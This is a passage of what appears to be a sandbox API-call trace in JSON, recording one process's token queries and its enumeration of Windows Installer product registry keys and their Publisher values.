"0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 989 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 990 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 991 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 992 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 993 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\xff\\x07\\x00\\x00" } ], "repeated": 0, "id": 994 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 995 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" } ], "repeated": 0, "id": 996 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 997 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 998 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 999 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" } ], "repeated": 0, "id": 1000 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1001 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1002 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 1003 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1004 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties" } ], "repeated": 0, "id": 1005 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 1006 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1007 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1008 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 1009 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1010 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 1011 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "8" }, { "name": "Name", "value": "E9F59850C17A7A840A2E45D143500A35" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" } ], "repeated": 0, "id": 1012 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1013 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 1014 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1015 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 1016 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1017 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1018 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\xff\\x07\\x00\\x00" } ], "repeated": 0, "id": 1019 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1020 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" } ], "repeated": 0, "id": 1021 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1022 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1023 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1024 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" } ], "repeated": 0, "id": 1025 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1026 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1027 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 1028 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1029 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties" } ], "repeated": 0, "id": 1030 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 1031 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1032 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1033 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 1034 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1035 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 1036 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "9" }, { "name": "Name", "value": "EAEFC47574231664CA1BD3EFB96C36EF" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" } ], "repeated": 0, "id": 1037 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1038 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 1039 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1040 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 1041 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1042 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": 